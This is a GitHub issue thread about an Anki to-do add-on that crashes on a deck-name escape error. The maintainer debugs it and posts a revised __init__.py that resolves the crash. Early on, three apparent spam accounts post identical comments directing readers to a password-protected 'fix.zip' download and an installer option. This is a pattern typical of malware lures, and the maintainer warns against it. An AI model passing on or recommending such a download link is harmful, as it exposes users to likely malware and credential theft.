### ISSUE TITLE
Unable to add tasks. 

### ISSUE THREAD

**Issue by ghost** [anbzerc/Anki-ToDo-addon#4]
Hey. Whenever i try to add Tools > Todo, Anki is collapsing. This is the error it is showing. I updated it to the latest version. 

Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: macOS-14.6.1-arm64-arm-64bit

Traceback (most recent call last):
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 428, in show_to_do_window
    mw.toDoWindows = toDoWindows = ToDoQtWindows(todo, mw)
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/ToDoQtWindows.py", line 27, in __init__
    html_list = todo.render_tasks([todo.get_all_task(), todo.get_all_completed()])
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 144, in get_all_completed
    decks_stats = self.get_deck_stats(self.get_deck_names())
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 108, in get_deck_stats
    responseDict[collection.decks.name(deckId)] = self.deckStatsToJson(deckNode)
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 67, in deckStatsToJson
    total_card_number = len(self.collection().find_cards(f'"deck:{name}"'))
  File "anki.collection", line 659, in find_cards
  File "anki._backend_generated", line 1637, in search_cards
  File "anki._backend", line 171, in _run_command
anki.errors.SearchError: <p>Invalid search: ⁨the escape sequence <code>⁨\l⁩</code> is not defined. If you want to search for a literal backslash <code>\</code>, prepend another one: <code>\\</code>.⁩</p>

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anbzerc** [comment]
No ! Dont install anything sketchy

**Comment by anbzerc** [comment]
@usernameduck Did you add a deck a named "\l" ?

**Comment by ghost** [comment]
@anbzerc . There isn't any deck called \l. Though i do have quite a bit of nested decks. The shortest deck name right now is "0".

**Comment by anbzerc** [comment]
@usernameduck Have you managed to add a deck, and if so, what's its name?

**Comment by ghost** [comment]
No. As soon as i press Todo in tools section, Anki is crashing.

**Comment by anbzerc** [comment]
@usernameduck That's strange... Could you run anki in a terminal as explained here #3 and give me the result? Have you tried deleting and reinstalling the plugin?

**Comment by ghost** [comment]
Yep, I reinstalled it and even turned of all the addons and checked it. Still the same issue. I don't know much about coding, i hope this is what you were asking. After running /Applications/Anki.app/Contents/MacOS/anki, and adding print(sys.path) in init.py  , it gave me this at the end -
```
`Traceback (most recent call last):
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 429, in show_to_do_window
    mw.toDoWindows = toDoWindows = ToDoQtWindows(todo, mw)
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/ToDoQtWindows.py", line 27, in __init__
    html_list = todo.render_tasks([todo.get_all_task(), todo.get_all_completed()])
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 145, in get_all_completed
    decks_stats = self.get_deck_stats(self.get_deck_names())
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 109, in get_deck_stats
    responseDict[collection.decks.name(deckId)] = self.deckStatsToJson(deckNode)
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 68, in deckStatsToJson
    total_card_number = len(self.collection().find_cards(f'"deck:{name}"'))
  File "anki.collection", line 659, in find_cards
  File "anki._backend_generated", line 1637, in search_cards
  File "anki._backend", line 171, in _run_command
anki.errors.SearchError: <p>Invalid search: ⁨the escape sequence <code>⁨\l⁩</code> is not defined. If you want to search for a literal backslash <code>\</code>, prepend another one: <code>\\</code>.⁩</p>

Qt warning: skipping QEventPoint(id=1 ts=0 pos=0,0 scn=1530.89,562.395 gbl=1530.89,562.395 Released ellipse=(1x1 ∡ 0) vel=0,0 press=-1530.89,-562.395 last=-1530.89,-562.395 Δ 1530.89,562.395) : no target window 
addons21/501542723/sync_routine.py:93:to avoid memory leaks, pass an appropriate parent to progress.timer() or use progress.single_shot()

 Saving collection ...
Checking if there are done tasks
addons21/1807500231/__init__.py:258:save() is deprecated: saving is automatic
No done task
Collection saved

Window should have been closed: <aqt.progress.ProgressDialog object at 0x125968550>
Window should have been closed: <PyQt6.QtWidgets.QMessageBox object at 0x125948ca0>
2024-08-26 18:23:00,868:WARNING:waitress: unhandled close event
do_window_cleanup error ignored: wrapped C/C++ object of type QTimer has been deleted
sai@Sais-Mac-mini ~ % 
```

**Comment by anbzerc** [comment]
Please go to addons -> select anki todo -> open files then please give me the task.json in the user_files folder

**Comment by ghost** [comment]
[task.json](https://github.com/user-attachments/files/16748901/task.json)

**Comment by anbzerc** [comment]
can you try to replace tasks": {}, by tasks": {"the name of one of your decks"},

**Comment by ghost** [comment]
```
{"tasks": {"ASL"}, "config": {"pauseConfig": "", "pauseConfigId": 0}}
```
```
Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: macOS-14.6.1-arm64-arm-64bit

Traceback (most recent call last):
  File "aqt.taskman", line 142, in _on_closures_pending
  File "aqt.taskman", line 86, in <lambda>
  File "aqt.operations", line 260, in wrapped_done
  File "aqt.deckbrowser", line 170, in success
  File "aqt.deckbrowser", line 186, in __renderPage
  File "_aqt.hooks", line 1837, in __call__
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 434, in on_deck_browser_will_render_content
    custom = todo.render_tasks(todo.get_all_task())
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 138, in get_all_task
    tasks_json = json.load(f)
  File "json", line 293, in load
  File "json", line 346, in loads
  File "json.decoder", line 337, in decode
  File "json.decoder", line 353, in raw_decode
json.decoder.JSONDecodeError: Expecting ':' delimiter: line 1 column 17 (char 16)
```

By the way should i remove  "print(sys.path) " in init.py

**Comment by anbzerc** [comment]
> ```
> {"tasks": {"ASL"}, "config": {"pauseConfig": "", "pauseConfigId": 0}}
> ```
> 
> ```
> Anki 24.06.3 (d678e393)  (ao)
> Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
> Platform: macOS-14.6.1-arm64-arm-64bit
> 
> Traceback (most recent call last):
>   File "aqt.taskman", line 142, in _on_closures_pending
>   File "aqt.taskman", line 86, in <lambda>
>   File "aqt.operations", line 260, in wrapped_done
>   File "aqt.deckbrowser", line 170, in success
>   File "aqt.deckbrowser", line 186, in __renderPage
>   File "_aqt.hooks", line 1837, in __call__
>   File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 434, in on_deck_browser_will_render_content
>     custom = todo.render_tasks(todo.get_all_task())
>   File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 138, in get_all_task
>     tasks_json = json.load(f)
>   File "json", line 293, in load
>   File "json", line 346, in loads
>   File "json.decoder", line 337, in decode
>   File "json.decoder", line 353, in raw_decode
> json.decoder.JSONDecodeError: Expecting ':' delimiter: line 1 column 17 (char 16)
> ```
> 
> By the way should i remove "print(sys.path) " in init.py

Yes you can remove it

Maybe add a comma after "ASL"

**Comment by ghost** [comment]
Do you mean add comma after deck name or in tasks.json
```
{"tasks": {"ASL,"}, "config": {"pauseConfig": "", "pauseConfigId": 0}}
```

```
Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: macOS-14.6.1-arm64-arm-64bit

Traceback (most recent call last):
  File "aqt.taskman", line 142, in _on_closures_pending
  File "aqt.taskman", line 86, in <lambda>
  File "aqt.operations", line 260, in wrapped_done
  File "aqt.deckbrowser", line 170, in success
  File "aqt.deckbrowser", line 186, in __renderPage
  File "_aqt.hooks", line 1837, in __call__
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 434, in on_deck_browser_will_render_content
    custom = todo.render_tasks(todo.get_all_task())
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 138, in get_all_task
    tasks_json = json.load(f)
  File "json", line 293, in load
  File "json", line 346, in loads
  File "json.decoder", line 337, in decode
  File "json.decoder", line 353, in raw_decode
json.decoder.JSONDecodeError: Expecting ':' delimiter: line 1 column 18 (char 17)
```

Before editing tasks.json file, the main window showed the window called - "we need to add tasks", now it shows copy debug info dialog as soon as the app launches

**Comment by anbzerc** [comment]
I mean like this : {"tasks": {"ASL",}, "config": {"pauseConfig": "", "pauseConfigId": 0}}

**Comment by ghost** [comment]
```
Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: macOS-14.6.1-arm64-arm-64bit

Traceback (most recent call last):
  File "aqt.taskman", line 142, in _on_closures_pending
  File "aqt.taskman", line 86, in <lambda>
  File "aqt.operations", line 260, in wrapped_done
  File "aqt.deckbrowser", line 170, in success
  File "aqt.deckbrowser", line 186, in __renderPage
  File "_aqt.hooks", line 1837, in __call__
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 434, in on_deck_browser_will_render_content
    custom = todo.render_tasks(todo.get_all_task())
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 138, in get_all_task
    tasks_json = json.load(f)
  File "json", line 293, in load
  File "json", line 346, in loads
  File "json.decoder", line 337, in decode
  File "json.decoder", line 353, in raw_decode
json.decoder.JSONDecodeError: Expecting ':' delimiter: line 1 column 17 (char 16)
```

**Comment by anbzerc** [comment]
I see, sorry it's my error. 
Can you copy that in task.json : ```{"tasks": {}, "config": {"pauseConfig": "", "pauseConfigId": 0}}```

and  you copy the following code in __init__.py of the plugin :

``` import functools
import json
import math
import pprint
import time

import anki.collection
import aqt.overview
from aqt import *
from aqt.operations import QueryOp
from aqt.overview import OverviewContent, Overview
from aqt.utils import showInfo, showText
from aqt.webview import WebContent
import os
# Append a path to sys.path in order to import element from other python files
import sys

# add to path
sys.path.insert(0, os.path.dirname(__file__))
print(sys.path)
plugin_path = os.path.dirname(__file__)
print("Pathhh : ", plugin_path)
from ToDoQtWindows import ToDoQtWindows

anki_version = tuple(int(segment) for segment in aqt.appVersion.split("."))


class Todo:

    # Get windows
    def window(self):
        return aqt.mw

    # Get user's collection
    def collection(self):
        collection = self.window().col
        if collection is None:
            raise Exception('collection is not available')

        return collection

    def get_path(self, name):
        return os.path.dirname(__file__)+f"/{name}"

    def get_deck_names(self):
        names_list = []
        for e in self.window().col.decks.all_names_and_ids():
            names_list.append(e.name)
        # print(names_list)
        return names_list

    def scheduler(self):
        scheduler = self.collection().sched
        if scheduler is None:
            raise Exception('scheduler is not available')
        return scheduler

    def collectDeckTreeChildren(self, parent_node):
        allNodes = {parent_node.deck_id: parent_node}
        for child in parent_node.children:
            for deckId, childNode in self.collectDeckTreeChildren(child).items():
                allNodes[deckId] = childNode
        return allNodes

    def deckStatsToJson(self, due_tree):
        name = self.collection().decks.name(due_tree.deck_id).replace("\\","\\\\")
        total_card_number = len(self.collection().find_cards(f'"deck:{name}"'))
        unseen_card_number = len(self.collection().find_cards(f'"deck:{name}" is:new'))
        card_in_learning = len(self.collection().find_cards(f'"deck:{name}" is:learn'))
        suspended_cards = len(self.collection().find_cards(f'"deck:{name}" is:suspended'))
        known_cards = total_card_number - unseen_card_number
        deckStats = {'deck_id': due_tree.deck_id,
                     'name': due_tree.name,
                     'total': total_card_number,
                     'unseen': unseen_card_number,
                     'inlearning': card_in_learning,
                     'suspended': suspended_cards,
                     'known': known_cards
                     }

        return deckStats

    def deckStatsToJsonByName(self, name):
        total_card_number = len(self.collection().find_cards(f'"deck:{name}"'))
        unseen_card_number = len(self.collection().find_cards(f'"deck:{name}" is:new'))
        card_in_learning = len(self.collection().find_cards(f'"deck:{name}" is:learn'))
        suspended_cards = len(self.collection().find_cards(f'"deck:{name}" is:suspended'))
        known_cards = total_card_number - unseen_card_number
        deckStats = {'deck_id': self.collection().decks.id(name),
                     'name': name,
                     'total': total_card_number,
                     'unseen': unseen_card_number,
                     'inlearning': card_in_learning,
                     'suspended': suspended_cards,
                     'known': known_cards
                     }

        return deckStats

    def get_deck_stats(self, decks: list):
        collection = self.collection()
        scheduler = self.scheduler()
        responseDict = {}
        deckIds = list(map(lambda d: collection.decks.id(d), decks))
        allDeckNodes = self.collectDeckTreeChildren(scheduler.deck_due_tree())
        for deckId, deckNode in allDeckNodes.items():
            if deckId in deckIds:
                responseDict[collection.decks.name(deckId)] = self.deckStatsToJson(deckNode)
        return responseDict

    def get_addon_path(self):
        return mw.addonManager.addonsFolder("1807500231")

    def add_new_deck_to_task(self, deck, config):
        # Add to json
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
            pause_id = int(tasks_json["config"]["pauseConfigId"])
        tasks_json["tasks"][deck] = config
        with open(self.get_path("user_files/task.json"), "w") as f:
            json.dump(tasks_json, f)

        # Check that the deck isn't the only one in tasks
        if len(tasks_json["tasks"]) > 1:
            # Set pause config
            self.setDeckConfigId([deck], pause_id)

    def move_deck_to_completed(self, deck):
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
        if deck in list(tasks_json["tasks"].keys()):
            del tasks_json["tasks"][deck]
        with open(self.get_path("user_files/task.json"), "w") as f:
            json.dump(tasks_json, f)

    def get_all_task(self) -> list:
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
        return list(tasks_json["tasks"].keys())
        # return tasks_json["tasks"]

    def get_all_completed(self) -> list:
        completed_list = []
        decks_stats = self.get_deck_stats(self.get_deck_names())
        for key, value in decks_stats.items():
            if value["unseen"] == 0:
                completed_list.append(key)

        return completed_list

    def getDeckConfig(self, deck):
        if deck not in self.get_deck_names():
            return False
        collection = self.collection()
        did = collection.decks.id(deck)
        return collection.decks.config_dict_for_deck_id(did)

    def getAllDeckConfig(self):
        decks = self.get_deck_names()
        configs = []
        for e in decks:
            configs.append(self.getDeckConfig(e))

        # removing duplicates
        return list(set(configs))

    def removeTask(self, task):
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
        try:
            del tasks_json["tasks"][task]
            with open(self.get_path("user_files/task.json"), "w") as f:
                json.dump(tasks_json, f)
        except Exception as error:
            print("Error removing task", error)

    def getAllDeckConfigNames(self) -> dict:
        decks = self.get_deck_names()
        configs = {}
        for e in decks:
            configs[self.getDeckConfig(e)["name"]] = self.getDeckConfig(e)["id"]
        # removing duplicates
        return configs

    def setPauseConfig(self, config, cid):
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
        tasks_json["config"]["pauseConfig"] = config
        tasks_json["config"]["pauseConfigId"] = cid
        with open(self.get_path("user_files/task.json"), "w") as f:
            json.dump(tasks_json, f)

    def remaining_days(self, deck, number_of_unseen_cards):
        with open(self.get_path("user_files/task.json")) as f:
            tasks_json = json.load(f)
        if deck in tasks_json["tasks"]:
            deck_config_id = tasks_json["tasks"][deck]
        else:
            deck_config_id = self.collection().decks.config_dict_for_deck_id(self.collection().decks.id(deck))["id"]
        deck_config = self.collection().decks.get_config(deck_config_id)
        new_cards = int(deck_config["new"]["perDay"])
        if new_cards == 0:
            return 0
        return math.ceil(number_of_unseen_cards / new_cards)

    def checkIfTaskDone(self) -> str:
        tasks = self.get_all_task()
        for e in tasks:
            stat = self.deckStatsToJsonByName(e)
            print(e, stat)
            # If deck is done, remove it from task list
            if stat["unseen"] == 0:

                # Enable the folowing deck
                deck_index = tasks.index(e)
                print(f"len {len(tasks)} index {deck_index+1}")
                # Check that deck isn't the last in tasks
                if len(tasks) > deck_index + 1:
                    with open(self.get_path("user_files/task.json")) as f:
                        config = json.load(f)
                        did = int(config["tasks"][tasks[deck_index+1]])
                    self.setDeckConfigId([tasks[deck_index+1]], did)
                    # Move deck to completed
                    self.move_deck_to_completed(e)
                    self.successfully_moved_deck(e)
                else:
                    self.move_deck_to_completed(e)
                    self.successfully_moved_deck(e)
                return e
        print("No done task")

    def setDeckConfigId(self, decks, configId):
        configId = int(configId)
        for deck in decks:
            if not deck in self.get_deck_names():
                return False

        collection = self.collection()

        for deck in decks:
            try:
                did = str(collection.decks.id(deck))
                deck_dict = aqt.mw.col.decks.decks[did]
                deck_dict['conf'] = configId
                collection.decks.save(deck_dict)
            except:
                return False

        return True

    def backgroundSave(self, *args):
        # Not working
        # To implement later ;)
        print("\n Saving collection ...")
        saving = QueryOp(
            parent=mw,
            op=lambda col: self.collection().save(),
            success=lambda col: print("Collection saved\n"),
        )
        saving.run_in_background()

    def runBackgroundCheck(self, *args):
        print("Checking if there are done tasks")
        self.checkIfTaskDone()
        # We accept several args because the callback give many args
        op = QueryOp(
            parent=mw,
            op=lambda col: self.checkIfTaskDone,
            success=lambda col: self.successfully_moved_deck,
        )
        #op.run_in_background()

    pass

    def successfully_moved_deck(self, deck) -> None:
        showInfo(f"Congratulation ! You'd learnt all cards in {deck}")

    def render_tasks(self, deck_list):
        # display blank is there's no tasks
        if len(deck_list) == 0:
            # Open html div
            final_HTML = """
                                            <div class="todo">
                                            <div class="column">
                                            """
            final_HTML += """<div class="element"><h3 class="decktitle">Time to add some tasks...</h3></div>
            """
            # Add style
            with open(self.get_path("style.html")) as f:
                final_HTML += f.read()
                f.close()
            # Close html div
            final_HTML += """
                                                </div>
                                            </div>
                                            """

            return final_HTML
        completed = self.get_all_completed()
        if isinstance(deck_list[0], list):
            finals_HTML = []
            for deck_element in deck_list:
                tasks = deck_element

                stats = self.get_deck_stats(self.get_deck_names())  # self.get_deck_names())
                final_HTML = """"""
                # add progress bar library
                with open(self.get_path("progressbarLibrary.html")) as f:
                    final_HTML += f.read()

                # Open html div
                final_HTML += """
                                <div class="todo">
                                <div class="column">
                                """

                with open(self.get_path("FirstElement.html")) as f:
                    base_element = f.read()

                for e in tasks:

                    # Get element stats dict
                    element_stats = stats[e]

                    # check element is the first task because it's different html
                    if e in completed:
                        pourcentage = 100
                    # Get deck progression
                    else:
                        pourcentage = round(
                            (element_stats["total"] - element_stats["unseen"]) / element_stats["total"] * 100,
                            1)

                    element_html = base_element
                    element_html = element_html.replace("DECKTITLE", self.collection().decks.basename(e))
                    element_html = element_html.replace("POURCENTAGEVALUE", f"{pourcentage}")

                    if tasks.index(e) == 0:
                        element_html = element_html.replace('class="example"', 'class="firstelementprogressbar"')
                        element_html = element_html.replace("REMAINING",
                                                            str(self.remaining_days(e, element_stats["unseen"]))+"remaining days")
                    else:
                        element_html = element_html.replace("REMAINING",
                                                            str(self.remaining_days(e, element_stats["unseen"]))+" days estimated")
                    final_HTML += element_html

                # Add style
                with open(self.get_path("style.html")) as f:
                    final_HTML += f.read()
                    f.close()
                # Close html div
                final_HTML += """
                                    </div>
                                </div>
                                """

                finals_HTML.append(final_HTML)

            return finals_HTML
        else:

            tasks = deck_list

            stats = self.get_deck_stats(self.get_deck_names())  # self.get_deck_names())
            final_HTML = """"""

            # add progress bar library
            with open(self.get_path("progressbarLibrary.html")) as f:
                final_HTML += f.read()

            # Open html div
            final_HTML += """
                    <div class="todo">
                    <div class="column">
                    """

            with open(self.get_path("FirstElement.html")) as f:
                base_element = f.read()

            for e in tasks:

                # Get element stats dict
                element_stats = stats[e]
                # Todo estimation jours restants avec config du deck
                # check element is the first task because it's different html
                # Get deck progression
                if e in completed:
                    pourcentage = 100
                # Get deck progression
                else:
                    pourcentage = round(
                        (element_stats["total"] - element_stats["unseen"]) / element_stats["total"] * 100,
                        1)

                element_html = base_element
                element_html = element_html.replace("DECKTITLE", self.collection().decks.basename(e))
                element_html = element_html.replace("POURCENTAGEVALUE", f"{pourcentage}")

                if tasks.index(e) == 0:
                    element_html = element_html.replace('class="example"', 'class="firstelementprogressbar"')
                    element_html = element_html.replace("REMAINING",
                                                        str(self.remaining_days(e, element_stats[
                                                            "unseen"])) + " days remaining")
                else:
                    element_html = element_html.replace("REMAINING",
                                                        str(self.remaining_days(e, element_stats[
                                                            "unseen"])) + " days estimated")
                final_HTML += element_html

            # Add style
            with open(self.get_path("style.html")) as f:
                final_HTML += f.read()
                f.close()
            # Close html div
            final_HTML += """
                        </div>
                    </div>
                    """

            return final_HTML


todo = Todo()


def show_to_do_window():
    pprint.pp(todo.collection().decks.get_config(1682080877248))
    mw.toDoWindows = toDoWindows = ToDoQtWindows(todo, mw)
    toDoWindows.show()



def on_deck_browser_will_render_content(deck_browser, content):
        custom = todo.render_tasks(todo.get_all_task())
        content.stats += custom
def register_webview():

    gui_hooks.deck_browser_will_render_content.append(on_deck_browser_will_render_content)
    mw.deckBrowser.refresh()
    # Add deck progression check to operation_did_execute hook
    gui_hooks.operation_did_execute.append(functools.partial(todo.backgroundSave))
    gui_hooks.operation_did_execute.append(functools.partial(todo.runBackgroundCheck))
    # show_to_do_window()


gui_hooks.profile_did_open.append(register_webview)

# create a new menu item, "test"
action = QAction("Todo", mw)
# set it to call testFunction when it's clicked
qconnect(action.triggered, show_to_do_window)
# and add it to the tools menu

mw.form.menuTools.addAction(action)
```

**Comment by anbzerc** [comment]
then try again give me the output

**Comment by ghost** [comment]
```
Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: macOS-14.6.1-arm64-arm-64bit

Traceback (most recent call last):
  File "aqt.progress", line 119, in handler
  File "aqt.main", line 219, in on_window_init
  File "aqt.main", line 318, in setupProfile
  File "aqt.main", line 530, in loadProfile
  File "_aqt.hooks", line 4101, in __call__
  File "/Users/sai/Library/Application Support/Anki2/addons21/1807500231/__init__.py", line 440, in register_webview
    gui_hooks.operation_did_execute.append(functools.partial(todo.backgroundSave))
NameError: name 'functools' is not defined
```

**Comment by anbzerc** [comment]
Can you add ```import functools``` at the beginning of the __init__ .py ?

**Comment by ghost** [comment]
Hey, sorry for the late reply. 
Thank you so much, It is  working now. Though it seems to lag a bit when i switch between reviewing and main screen,. Too many cards might be the reason for me. 

![image](https://github.com/user-attachments/assets/c407e3dd-5403-4ed8-b931-717d66dee71e)

**Comment by anbzerc** [comment]
I'm glad it works 😁
